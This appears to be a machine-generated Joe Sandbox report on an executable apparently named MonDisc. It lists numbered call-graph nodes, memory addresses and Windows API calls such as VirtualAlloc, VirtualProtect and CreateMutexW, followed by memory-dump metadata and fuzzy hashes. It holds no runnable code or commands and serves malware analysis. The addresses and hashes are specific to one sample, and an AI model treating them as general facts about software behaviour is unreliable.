57851->57856 58184 7ff62c954220 18 API calls 57851->58184 58139 7ff62c93f2c0 57852->58139 57855 7ff62c910a90 37 API calls 57855->57856 57856->57855 57857 7ff62c911aa3 57856->57857 57857->57800 57858 7ff62c911b32 57858->57852 58185 7ff62c954120 16 API calls _vwscanf_s_l 57858->58185 57896 7ff62c93b310 20 API calls 57860->57896 57862 7ff62c910b43 57862->57814 57863 7ff62c910e18 57865 7ff62c910e89 57863->57865 57866 7ff62c910e4f 57863->57866 57864 7ff62c910ab5 57864->57862 57864->57863 57897 7ff62c954220 18 API calls 57864->57897 57867 7ff62c910e97 57865->57867 57926 7ff62c910280 35 API calls _fread_nolock 57865->57926 57869 7ff62c910e74 57866->57869 57910 7ff62c9116c0 57866->57910 57867->57814 57869->57814 57872 7ff62c910cc7 57872->57863 57898 7ff62c90a4b0 57872->57898 57875 7ff62c910cf6 57909 7ff62c954120 16 API calls _vwscanf_s_l 57875->57909 57877 7ff62c911c7e 57876->57877 57879 7ff62c939cb9 57876->57879 57880 7ff62c939dd0 57877->57880 57952 7ff62c939a10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind _handle_error 57879->57952 57881 7ff62c8f3037 43 API calls 57880->57881 57882 7ff62c939e1e 57881->57882 57886 7ff62c939e7e 57882->57886 57953 7ff62c901990 57882->57953 57884 7ff62c939ebc 57885 7ff62c939ecc 57884->57885 57887 7ff62c93bce8 57884->57887 57888 7ff62c93bcb5 57884->57888 57885->57814 57886->57814 57965 7ff62c90fe90 57887->57965 57964 7ff62c909c30 18 API calls 57888->57964 57891 7ff62c93bcd7 57891->57814 57896->57864 57897->57872 57899 7ff62c90a6ea 57898->57899 57904 7ff62c90a4d9 57898->57904 57900 7ff62c90a6ef 57899->57900 57934 7ff62c901650 18 API calls 57899->57934 57900->57875 57907 7ff62c90a598 57904->57907 57927 7ff62c909d30 57904->57927 57905 7ff62c90a606 _fread_nolock 57906 7ff62c90a6e2 57905->57906 57933 7ff62c90a850 18 API calls _fread_nolock 57905->57933 57907->57875 57909->57863 57911 7ff62c9116d7 57910->57911 57913 7ff62c911714 57910->57913 57911->57869 57912 7ff62c9117c5 57914 7ff62c9119e9 57912->57914 57915 
7ff62c9117f1 57912->57915 57913->57912 57913->57914 57947 7ff62c909c30 18 API calls 57913->57947 57951 7ff62c910280 35 API calls _fread_nolock 57914->57951 57917 7ff62c9119df 57915->57917 57948 7ff62c954220 18 API calls 57915->57948 57950 7ff62c9418b0 18 API calls _fread_nolock 57917->57950 57919 7ff62c9119e7 57919->57869 57922 7ff62c91189b 57922->57917 57923 7ff62c90a4b0 18 API calls 57922->57923 57924 7ff62c9118c8 57923->57924 57949 7ff62c954120 16 API calls _vwscanf_s_l 57924->57949 57926->57867 57935 7ff62c915190 57927->57935 57929 7ff62c909d61 57929->57905 57933->57906 57936 7ff62c9151aa 57935->57936 57938 7ff62c909d57 57936->57938 57940 7ff62c914230 57936->57940 57938->57929 57939 7ff62c9015c0 18 API calls 57938->57939 57941 7ff62c91426b 57940->57941 57942 7ff62c9142fd 57940->57942 57941->57942 57944 7ff62c91427e GetLastError VirtualAlloc SetLastError 57941->57944 57943 7ff62c914314 GetLastError VirtualAlloc SetLastError 57942->57943 57946 7ff62c91434f 57942->57946 57943->57946 57944->57942 57945 7ff62c9142b6 57944->57945 57945->57942 57945->57946 57946->57938 57947->57912 57948->57922 57949->57917 57950->57919 57951->57919 57952->57877 57968 7ff62c900c60 57953->57968 57955 7ff62c9019ad 57956 7ff62c9019de 57955->57956 57980 7ff62c9017a0 57955->57980 57958 7ff62c901990 17 API calls 57956->57958 57960 7ff62c9019e4 57958->57960 57959 7ff62c901a37 57959->57884 57960->57959 57962 7ff62c901b01 57960->57962 57983 7ff62c901970 18 API calls _fread_nolock 57960->57983 57962->57959 57963 7ff62c901b6b RtlUnwindEx 57962->57963 57963->57959 57964->57891 57966 7ff62c901990 18 API calls 57965->57966 57967 7ff62c90fed0 57966->57967 57969 7ff62c900c91 _fread_nolock 57968->57969 57970 7ff62c900da0 RaiseException _purecall 57968->57970 57971 7ff62c900cab RtlCaptureContext RtlLookupFunctionEntry 57969->57971 57972 7ff62c900cd9 57971->57972 57976 7ff62c900d3e 57971->57976 57973 7ff62c900ce0 RtlVirtualUnwind 57972->57973 57974 7ff62c900d1e RtlLookupFunctionEntry 57973->57974 57975 
7ff62c900d76 57973->57975 57974->57973 57974->57976 57978 7ff62c973de0 _handle_error 4 API calls 57975->57978 57976->57975 57977 7ff62c900d58 RtlRestoreContext 57976->57977 57977->57975 57979 7ff62c900d96 57978->57979 57979->57955 57982 7ff62c901880 57980->57982 57981 7ff62c901990 18 API calls 57981->57982 57982->57981 57983->57962 57986 7ff62c95279d 57984->57986 57985 7ff62c9527cc 58025 7ff62c90fde0 57985->58025 57986->57985 58037 7ff62c958dc0 18 API calls 57986->58037 57989 7ff62c952807 58028 7ff62c93b610 57989->58028 57991 7ff62c952e89 57992 7ff62c90fe90 18 API calls 57991->57992 57993 7ff62c952e98 57992->57993 57994 7ff62c90fe90 18 API calls 57993->57994 57996 7ff62c952ea7 57994->57996 57995 7ff62c952e7f 58047 7ff62c94d2d0 23 API calls 57995->58047 57996->57819 58003 7ff62c94f820 23 API calls 58007 7ff62c952854 58003->58007 58006 7ff62c952ce1 _fread_nolock 58046 7ff62c94f930 23 API calls _handle_error 58006->58046 58007->57991 58007->57995 58007->58003 58007->58006 58010 7ff62c90fde0 18 API calls 58007->58010 58038 7ff62c94e460 18 API calls 58007->58038 58039 7ff62c9503f0 23 API calls 58007->58039 58040 7ff62c94f930 23 API calls _handle_error 58007->58040 58041 7ff62c94b5e0 18 API calls 58007->58041 58042 7ff62c949610 23 API calls 58007->58042 58043 7ff62c953750 23 API calls 58007->58043 58044 7ff62c949f10 23 API calls _handle_error 58007->58044 58045 7ff62c958bc0 18 API calls 58007->58045 58010->58007 58011 7ff62c952d24 58011->57993 58012 7ff62c952d2e 58011->58012 58013 7ff62c973de0 _handle_error 4 API calls 58012->58013 58014 7ff62c952e6e 58013->58014 58014->57819 58016 7ff62c911db2 58015->58016 58057 7ff62c93b370 58016->58057 58018 7ff62c911ec0 _fread_nolock 58019 7ff62c912056 58018->58019 58063 7ff62c954220 18 API calls 58018->58063 58019->57820 58021 7ff62c911fd7 58021->58019 58022 7ff62c90a4b0 18 API calls 58021->58022 58023 7ff62c912000 58022->58023 58064 7ff62c954120 16 API calls _vwscanf_s_l 58023->58064 58026 7ff62c909d30 18 API calls 58025->58026 
58027 7ff62c90fe25 _fread_nolock 58026->58027 58027->57989 58029 7ff62c93b636 58028->58029 58030 7ff62c93b62c 58028->58030 58032 7ff62c93b63f VirtualProtect 58029->58032 58033 7ff62c93b634 58029->58033 58048 7ff62c93b7f0 58030->58048 58032->58033 58034 7ff62c93b681 58032->58034 58033->58007 58056 7ff62c93b9d0 19 API calls 58034->58056 58036 7ff62c93b689 58037->57985 58038->58007 58039->58007 58040->58007 58041->58007 58042->58007 58043->58007 58044->58007 58045->58007 58046->58011 58051 7ff62c93b846 58048->58051 58049 7ff62c93b84b VirtualAlloc 58049->58051 58050 7ff62c93b8d6 58050->58033 58051->58049 58051->58050 58052 7ff62c93b889 VirtualFree 58051->58052 58053 7ff62c93b934 58051->58053 58052->58051 58054 7ff62c90fe90 18 API calls 58053->58054 58055 7ff62c93b941 VirtualFree 58054->58055 58056->58036 58058 7ff62c93b389 VirtualProtect 58057->58058 58060 7ff62c93b3ac 58057->58060 58059 7ff62c93b3bc 58058->58059 58058->58060 58065 7ff62c93b9d0 19 API calls 58059->58065 58060->58018 58062 7ff62c93b3c4 58063->58021 58064->58019 58065->58062 58067 7ff62c8fb2de 58066->58067 58068 7ff62c90909e 58066->58068 58070 7ff62c909140 58067->58070 58068->58067 58075 7ff62c9079b0 58068->58075 58071 7ff62c8fb2e6 58070->58071 58073 7ff62c909159 58070->58073 58071->57800 58073->58071 58074 7ff62c9079b0 18 API calls 58073->58074 58080 7ff62c90bce0 18 API calls 58073->58080 58074->58073 58077 7ff62c9079f9 58075->58077 58076 7ff62c907a72 58076->58068 58077->58076 58078 7ff62c901990 18 API calls 58077->58078 58079 7ff62c907a95 58078->58079 58079->58068 58080->58073 58087 7ff62c913c97 58081->58087 58082 7ff62c913da4 58082->57833 58084 7ff62c913df4 58085 7ff62c901990 18 API calls 58084->58085 58086 7ff62c913e11 58085->58086 58087->58082 58089 7ff62c913d96 58087->58089 58106 7ff62c913ac0 18 API calls 58087->58106 58089->58082 58107 7ff62c901970 18 API calls _fread_nolock 58089->58107 58108 7ff62c91c380 58090->58108 58093 7ff62c91ccc4 58094 7ff62c91cc4b 58095 7ff62c91cc7a 58094->58095 58126 
7ff62c91c160 18 API calls _fread_nolock 58094->58126 58095->57840 58097 7ff62c91cb84 58097->58094 58098 7ff62c91ccb6 58097->58098 58099 7ff62c91c1c0 18 API calls 58097->58099 58119 7ff62c91ccd0 58097->58119 58125 7ff62c8fb4d0 18 API calls 58097->58125 58127 7ff62c91c160 18 API calls _fread_nolock 58098->58127 58099->58097 58102->57840 58103->57844 58104->57843 58105->57848 58107->58084 58109 7ff62c91c398 58108->58109 58112 7ff62c91c3a4 58108->58112 58128 7ff62c91c1c0 18 API calls _fread_nolock 58109->58128 58110 7ff62c91c4ca 58110->58097 58112->58110 58114 7ff62c91c43f 58112->58114 58129 7ff62c934580 18 API calls 58112->58129 58115 7ff62c91c455 58114->58115 58130 7ff62c91c1c0 18 API calls _fread_nolock 58114->58130 58117 7ff62c90a4b0 18 API calls 58115->58117 58118 7ff62c91c4ac 58117->58118 58118->58097 58120 7ff62c91cd44 58119->58120 58131 7ff62c909cc0 58120->58131 58123 7ff62c91cdc3 _fread_nolock 58137 7ff62c91c4e0 18 API calls 58123->58137 58124 7ff62c91cfdb _fread_nolock 58124->58097 58125->58097 58126->58098 58127->58093 58128->58112 58129->58114 58130->58115 58136 7ff62c915190 6 API calls 58131->58136 58132 7ff62c909ce7 58133 7ff62c909cef 58132->58133 58138 7ff62c9015c0 18 API calls 58132->58138 58133->58123 58136->58132 58137->58124 58140 7ff62c93f308 58139->58140 58141 7ff62c93f506 58140->58141 58142 7ff62c93f4fe 58140->58142 58203 7ff62c93bd80 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind _handle_error 58140->58203 58145 7ff62c940a6f 58141->58145 58148 7ff62c93f564 58141->58148 58178 7ff62c93f518 58141->58178 58204 7ff62c93bb10 18 API calls 58142->58204 58147 7ff62c90fe90 18 API calls 58145->58147 58146 7ff62c93f5e8 58149 7ff62c93f64a 58146->58149 58206 7ff62c945970 18 API calls 58146->58206 58150 7ff62c940a7c 58147->58150 58148->58146 58186 7ff62c963c80 58148->58186 58154 7ff62c93f6aa 58149->58154 58207 7ff62c945970 18 API calls 58149->58207 58151 7ff62c90fe90 18 API calls 58150->58151 58153 7ff62c940a87 58151->58153 
58157 7ff62c90fe90 18 API calls 58153->58157 58155 7ff62c93f6e8 58154->58155 58156 7ff62c93f79b 58154->58156 58163 7ff62c93f6f6 58155->58163 58164 7ff62c93f73c 58155->58164 58183 7ff62c93f732 58155->58183 58156->58183 58211 7ff62c945970 18 API calls 58156->58211 58160 7ff62c940a95 58157->58160 58167 7ff62c90fe90 18 API calls 58160->58167 58161 7ff62c93f5e0 58205 7ff62c93bb10 18 API calls 58161->58205 58163->58183 58208 7ff62c958f20 18 API calls 58163->58208 58165 7ff62c93f76d 58164->58165 58166 7ff62c93f75b 58164->58166 58210 7ff62c959140 18 API calls 58165->58210 58209 7ff62c958fd0 18 API calls 58166->58209 58171 7ff62c940aa3 58167->58171 58173 7ff62c90fe90 18 API calls 58171->58173 58174 7ff62c940ab1 58173->58174 58175 7ff62c90fe90 18 API calls 58174->58175 58177 7ff62c940abc 58175->58177 58176 7ff62c90fe90 18 API calls 58179 7ff62c940af7 58176->58179 58180 7ff62c90fe90 18 API calls 58177->58180 58178->57856 58181 7ff62c940aca 58180->58181 58200 7ff62c90fee0 58181->58200 58183->58176 58183->58178 58184->57858 58185->57852 58187 7ff62c963cad 58186->58187 58188 7ff62c963e93 58187->58188 58190 7ff62c963e91 58187->58190 58191 7ff62c963e7e 58187->58191 58213 7ff62c9604f0 18 API calls 58188->58213 58190->58161 58192 7ff62c963e9d 58191->58192 58193 7ff62c963e83 58191->58193 58192->58190 58195 7ff62c90fe90 18 API calls 58192->58195 58212 7ff62c958fd0 18 API calls 58193->58212 58197 7ff62c963edf 58195->58197 58196 7ff62c963eed 58196->58161 58197->58196 58214 7ff62c958fd0 18 API calls 58197->58214 58199 7ff62c963f22 58199->58161 58201 7ff62c901990 18 API calls 58200->58201 58202 7ff62c90ff15 58201->58202 58203->58142 58204->58141 58205->58146 58206->58149 58207->58154 58208->58183 58209->58183 58210->58183 58211->58183 58212->58190 58213->58190 58214->58199 58215->57773 58216->57773 58217->57778 58218->57778 58220 7ff62c8fe2c5 58219->58220 58221 7ff62c90a4b0 18 API calls 58220->58221 58222 7ff62c8fe2e5 58221->58222 58225 7ff62c90dcb0 18 API calls 58222->58225 58224 
7ff62c8fe307 58224->57778 58225->58224 58226 2247ab73f7f 58228 2247ab73f88 58226->58228 58227 2247ab73fd4 58229 2247ab7400a CreateMutexW 58227->58229 58231 2247ab73f31 58227->58231 58228->58227 58228->58231 58232 2247ab74036 58228->58232 58229->58231 58233 2247ab73fd4 58232->58233 58233->58232 58234 2247ab7400a CreateMutexW 58233->58234 58235 2247ab7404d 58233->58235 58234->58235 58235->58227 58236 7ff62c8f19c7 58237 7ff62c8f1a03 58236->58237 58238 7ff62c8f19df 58236->58238 58242 7ff62c90ccf0 58237->58242 58238->58237 58247 7ff62c9b0070 16 API calls 58238->58247 58241 7ff62c8f3297 58244 7ff62c90cd40 58242->58244 58243 7ff62c90cd85 58243->58241 58244->58243 58248 7ff62c901660 58244->58248 58246 7ff62c90ce65 58247->58237 58249 7ff62c901688 58248->58249 58253 7ff62c900be0 58249->58253 58254 7ff62c900c16 58253->58254 58261 7ff62c919f60 58254->58261 58259 7ff62c9017a0 18 API calls 58260 7ff62c900c56 58259->58260 58266 7ff62c919f94 58261->58266 58262 7ff62c90a4b0 18 API calls 58263 7ff62c91a1be 58262->58263 58264 7ff62c900c38 58263->58264 58276 7ff62c8fb4d0 18 API calls 58263->58276 58267 7ff62c917230 58264->58267 58266->58262 58268 7ff62c9172b2 58267->58268 58271 7ff62c917256 58267->58271 58278 7ff62c919f30 18 API calls 58268->58278 58270 7ff62c9172b0 58272 7ff62c973de0 _handle_error 4 API calls 58270->58272 58271->58268 58273 7ff62c91727e 58271->58273 58274 7ff62c900c4e 58272->58274 58277 7ff62c919f30 18 API calls 58273->58277 58274->58259 58276->58264 58277->58270 58278->58270 58279 7ff62c911e28 58290 7ff62c9525b0 58279->58290 58281 7ff62c911e4c 58282 7ff62c93b370 20 API calls 58281->58282 58283 7ff62c911ec0 _fread_nolock 58282->58283 58284 7ff62c912056 58283->58284 58285 7ff62c954220 18 API calls 58283->58285 58286 7ff62c911fd7 58285->58286 58286->58284 58287 7ff62c90a4b0 18 API calls 58286->58287 58288 7ff62c912000 58287->58288 58289 7ff62c954120 16 API calls 58288->58289 58289->58284 58293 7ff62c93b4f0 58290->58293 58292 7ff62c9525e9 58294 7ff62c93b57e 58293->58294 
58295 7ff62c93b505 58293->58295 58296 7ff62c93b5d3 58294->58296 58299 7ff62c93b59a 58294->58299 58297 7ff62c93b551 VirtualProtect 58295->58297 58298 7ff62c93b511 58295->58298 58296->58296 58305 7ff62c93b5e8 VirtualProtect 58296->58305 58301 7ff62c93b571 58297->58301 58302 7ff62c93b600 58297->58302 58300 7ff62c93b51a VirtualProtect 58298->58300 58298->58301 58303 7ff62c93b5c5 58299->58303 58304 7ff62c93b5a3 VirtualProtect 58299->58304 58300->58302 58307 7ff62c93b53a 58300->58307 58301->58292 58310 7ff62c93b9d0 19 API calls 58302->58310 58303->58292 58304->58302 58308 7ff62c93b5bb 58304->58308 58305->58302 58305->58303 58307->58292 58308->58303 58309 7ff62c93b608 58310->58309 58311 7ff62c8f4a01 58312 7ff62c8f4a0c 58311->58312 58314 7ff62c8f4a30 58311->58314 58312->58314 58315 7ff62c8ff9d0 58312->58315 58330 7ff62c984d84 58315->58330 58318 7ff62c8ffa42 58319 7ff62c8ffa78 58318->58319 58333 7ff62c910750 58318->58333 58321 7ff62c8ffaa7 58319->58321 58339 7ff62c8feea0 18 API calls _handle_error 58319->58339 58322 7ff62c8ffb0f 58321->58322 58340 7ff62c8feea0 18 API calls _handle_error 58321->58340 58323 7ff62c8ffb4a 58322->58323 58341 7ff62c8feea0 18 API calls _handle_error 58322->58341 58325 7ff62c984d84 _set_errno_from_matherr 11 API calls 58323->58325 58327 7ff62c8ffb4f SetLastError 58325->58327 58328 7ff62c9ee048 58327->58328 58342 7ff62c9c5560 GetLastError 58330->58342 58332 7ff62c8ff9ef GetLastError 58332->58318 58334 7ff62c910789 58333->58334 58335 7ff62c8f3037 43 API calls 58334->58335 58336 7ff62c9107ad 58335->58336 58337 7ff62c9107d7 58336->58337 58338 7ff62c8f3037 43 API calls 58336->58338 58337->58319 58338->58336 58339->58321 58340->58322 58341->58323 58343 7ff62c9c5587 58342->58343 58344 7ff62c9c5582 58342->58344 58348 7ff62c9c558f SetLastError 58343->58348 58365 7ff62c9c6f60 4 API calls 2 library calls 58343->58365 58373 7ff62c9c6f18 GetLastError FreeLibrary GetProcAddress TlsGetValue try_get_function 58344->58373 58347 7ff62c9c55aa 58347->58348 58366 
7ff62c9c5ecc 58347->58366 58348->58332 58352 7ff62c9c55db 58376 7ff62c9c6f60 4 API calls 2 library calls 58352->58376 58353 7ff62c9c55cb 58374 7ff62c9c6f60 4 API calls 2 library calls 58353->58374 58356 7ff62c9c55d2 58375 7ff62c9c5f4c 11 API calls 2 library calls 58356->58375 58357 7ff62c9c55e3 58358 7ff62c9c55f9 58357->58358 58359 7ff62c9c55e7 58357->58359 58378 7ff62c9c4e98 11 API calls _set_errno_from_matherr 58358->58378 58377 7ff62c9c6f60 4 API calls 2 library calls 58359->58377 58363 7ff62c9c5601 58379 7ff62c9c5f4c 11 API calls 2 library calls 58363->58379 58365->58347 58371 7ff62c9c5edd _set_errno_from_matherr 58366->58371 58367 7ff62c9c5f2e 58370 7ff62c984d84 _set_errno_from_matherr 10 API calls 58367->58370 58368 7ff62c9c5f12 RtlAllocateHeap 58369 7ff62c9c55bd 58368->58369 58368->58371 58369->58352 58369->58353 58370->58369 58371->58367 58371->58368 58380 7ff62c9e25c0 RtlLeaveCriticalSection _invalid_parameter_noinfo _set_errno_from_matherr 58371->58380 58374->58356 58375->58348 58376->58357 58377->58356 58378->58363 58379->58348 58380->58371 58381 7ff62c8f1a21 58384 7ff62c90cf30 58381->58384 58383 7ff62c8f1a47 58392 7ff62c90cf63 58384->58392 58385 7ff62c90d2e7 58395 7ff62c901650 18 API calls 58385->58395 58387 7ff62c90a4b0 18 API calls 58387->58392 58388 7ff62c90d1af 58389 7ff62c90d151 58388->58389 58390 7ff62c901660 18 API calls 58388->58390 58389->58383 58393 7ff62c90d31d 58390->58393 58392->58385 58392->58387 58392->58388 58392->58389 58394 7ff62c936220 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 58392->58394 58394->58392 58396 7ff62c905020 58397 7ff62c8f3037 43 API calls 58396->58397 58398 7ff62c905094 58397->58398 58399 7ff62c8f63ba GetDesktopWindow 58400 7ff62c8f63cc 58399->58400 58401 7ff62c8f6476 GetDoubleClickTime 58400->58401 58402 7ff62c8f647e GetSystemDefaultLangID 58401->58402 58402->58402 58403 7ff62c8f6495 58402->58403 58427 7ff62c984af0 58403->58427 58406 7ff62c8f64b8 58407 7ff62c8f6509 
GetDoubleClickTime 58406->58407 58409 7ff62c8f6514 58407->58409 58408 7ff62c8f65d4 GetDoubleClickTime GetDesktopWindow GetWindowTextLengthW 58410 7ff62c8f65f1 58408->58410 58409->58408 58409->58409 58410->58410 58411 7ff62c8f6602 GetDoubleClickTime 58410->58411 58412 7ff62c8f660a 58411->58412 58412->58412 58413 7ff62c8f6629 GetWindowTextLengthW 58412->58413 58414 7ff62c8f6636 58413->58414 58415 7ff62c8f66ac GetCommandLineW GetForegroundWindow GetTopWindow 58414->58415 58416 7ff62c8f66d0 58415->58416 58417 7ff62c984af0 13 API calls 58416->58417 58418 7ff62c8f66dc 58417->58418 58419 7ff62c8f66e6 GetLargePageMinimum GetForegroundWindow 58418->58419 58421 7ff62c8f66f9 58419->58421 58420 7ff62c8f67f0 GetTickCount 58422 7ff62c8f6884 58420->58422 58421->58420 58425 7ff62c8f672e 58421->58425 58423 7ff62c8f68a0 7 API calls 58422->58423 58426 7ff62c8f68e6 58423->58426 58424 7ff62c8f6749 GetForegroundWindow 58424->58425 58425->58420 58425->58421 58425->58424 58426->58426 58428 7ff62c984b18 58427->58428 58438 7ff62c984bcb _fread_nolock 58427->58438 58429 7ff62c984bdb 58428->58429 58432 7ff62c984b2f 58428->58432 58431 7ff62c9c5560 _set_errno_from_matherr 11 API calls 58429->58431 58429->58438 58430 7ff62c984d84 _set_errno_from_matherr 11 API calls 58439 7ff62c8f64ad GetDoubleClickTime 58430->58439 58433 7ff62c984bf7 58431->58433 58434 7ff62c984b51 SetConsoleCtrlHandler 58432->58434 58436 7ff62c984b70 58432->58436 58433->58438 58441 7ff62c9c5a90 12 API calls _set_errno_from_matherr 58433->58441 58434->58436 58440 7ff62c9c5b8c RtlLeaveCriticalSection 58436->58440 58438->58430 58438->58439 58439->58406 58441->58438 58442 7ff62c90b5f0 58445 7ff62c90bff0 58442->58445 58444 7ff62c90b608 _fread_nolock 58444->58444 58446 7ff62c90c056 58445->58446 58447 7ff62c90c014 58445->58447 58448 7ff62c909cc0 18 API calls 58446->58448 58449 7ff62c909cc0 18 API calls 58447->58449 58450 7ff62c90c060 58448->58450 58451 7ff62c90c021 58449->58451 58450->58451 58452 7ff62c90c10b 58450->58452 58454 
7ff62c909d30 18 API calls 58450->58454 58451->58452 58453 7ff62c90c0e2 58451->58453 58455 7ff62c90c0bd 58451->58455 58459 7ff62c901650 18 API calls 58452->58459 58453->58444 58454->58451 58457 7ff62c909d30 18 API calls 58455->58457 58457->58453 58460 7ff62c8fa3fb 58463 7ff62c8fa391 58460->58463 58461 7ff62c8fa469 GetMessageExtraInfo 58467 7ff62c8fa474 58461->58467 58462 7ff62c8fa549 AnyPopup 58465 7ff62c8fa554 58462->58465 58463->58460 58463->58461 58464 7ff62c8fa3ad GetUserDefaultLangID 58463->58464 58464->58463 58464->58464 58466 7ff62c8fa5c2 GetLargePageMinimum GetModuleHandleW 58465->58466 58468 7ff62c8fa5de 58466->58468 58467->58462 58467->58466 58471 7ff62c8fb610 58468->58471 58480 7ff62c916850 58471->58480 58473 7ff62c8f3037 43 API calls 58474 7ff62c8fb637 58473->58474 58474->58473 58475 7ff62c8fb6bf 58474->58475 58485 7ff62c910570 58475->58485 58477 7ff62c8fa5fb 58478 7ff62c8fb6df 58478->58477 58479 7ff62c914ac0 GetLastError VirtualQuery VirtualFree SetLastError 58478->58479 58479->58477 58481 7ff62c9168bb 58480->58481 58482 7ff62c91686e WaitForSingleObject RtlDeleteCriticalSection 58480->58482 58481->58474 58483 7ff62c9168ab 58482->58483 58488 7ff62c910280 35 API calls _fread_nolock 58483->58488 58489 7ff62c93b3d0 58485->58489 58488->58481 58490 7ff62c91058c 58489->58490 58491 7ff62c93b3f3 58489->58491 58492 7ff62c93b400 VirtualFree 58491->58492 58492->58490 58492->58492 58493 7ff62c9c670c 58494 7ff62c9c676d 58493->58494 58500 7ff62c9c6768 try_get_function 58493->58500 58495 7ff62c9c6850 58495->58494 58496 7ff62c9c685e GetProcAddress 58495->58496 58497 7ff62c9c686f 58496->58497 58497->58494 58498 7ff62c9c67bd GetLastError 58498->58500 58499 7ff62c9c6835 FreeLibrary 58499->58500 58500->58494 58500->58495 58500->58498 58500->58499 58501 7ff62c8f4a97 58502 7ff62c8f4aa7 58501->58502 58505 7ff62c8ff020 58502->58505 58504 7ff62c8f4ac4 58506 7ff62c984d84 _set_errno_from_matherr 11 API calls 58505->58506 58507 7ff62c8ff04e GetLastError 58506->58507 58508 
7ff62c8ff080 58507->58508 58509 7ff62c8ff0ca 58507->58509 58510 7ff62c8ff0be 58508->58510 58522 7ff62c8fb470 18 API calls 58508->58522 58509->58510 58523 7ff62c8fb470 18 API calls 58509->58523 58512 7ff62c8ff111 58510->58512 58513 7ff62c8ff0f6 58510->58513 58516 7ff62c910750 43 API calls 58512->58516 58518 7ff62c8ff131 58512->58518 58524 7ff62c910630 45 API calls _set_errno_from_matherr 58513->58524 58516->58518 58517 7ff62c8ff105 58520 7ff62c984d84 _set_errno_from_matherr 11 API calls 58517->58520 58518->58517 58518->58518 58525 7ff62c8feea0 18 API calls _handle_error 58518->58525 58521 7ff62c8ff1e5 SetLastError 58520->58521 58521->58504 58522->58510 58523->58510 58525->58517

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Time$ClickDefaultDoubleLang$MessageParentSystemUser
                              • String ID:
                              • API String ID: 2994643361-0
                              • Opcode ID: 91ec8c885c2c6ff6561f716371217a6039addec031bcfe83c507029f45e2ccbf
                              • Instruction ID: c255fcdf3587bed30c444a5272f0466265782f6c69e309d1b253e226457bd770
                              • Opcode Fuzzy Hash: 91ec8c885c2c6ff6561f716371217a6039addec031bcfe83c507029f45e2ccbf
                              • Instruction Fuzzy Hash: 8B825C62E289074AFF545F34AD6A2B92AD47F25370FA4463ED809D2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Time$ClickDefaultDoubleLang$MessageParentSystemUser
                              • String ID:
                              • API String ID: 2994643361-0
                              • Opcode ID: 64eabef1d45d85b0c78bb19536166fa48b41f505652a30b45eab00c61a6f173f
                              • Instruction ID: 7c62de22613ab7baebe31576a0eb5790a5b5476824f76493797b5bfa5578368a
                              • Opcode Fuzzy Hash: 64eabef1d45d85b0c78bb19536166fa48b41f505652a30b45eab00c61a6f173f
                              • Instruction Fuzzy Hash: 10825C62E289074AFF545F34AD6A2B92AD47F25374FA4463ED809D2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
